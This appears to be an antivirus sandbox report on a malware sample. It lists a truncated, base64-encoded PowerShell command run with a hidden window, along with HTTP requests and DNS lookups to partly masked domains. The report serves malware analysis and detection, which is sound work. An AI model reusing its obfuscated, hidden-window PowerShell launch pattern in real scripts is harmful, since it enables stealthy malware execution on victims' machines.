Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...
Network activity
TCP
HTTP GET requests
- http://da####harmajobs.com/cgi-bin/CyCdO/
- http://ne####letmall.com/
UDP
- DNS ASK ro##ie.in
- DNS ASK en######bconsulting.co.za
- DNS ASK gr####ges.org.my
- DNS ASK da####harmajobs.com
- DNS ASK co#####aladvance.com
- DNS ASK ro###night.in
- DNS ASK gy###scle.tk
- DNS ASK ne####letmall.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...' (with hidden window)
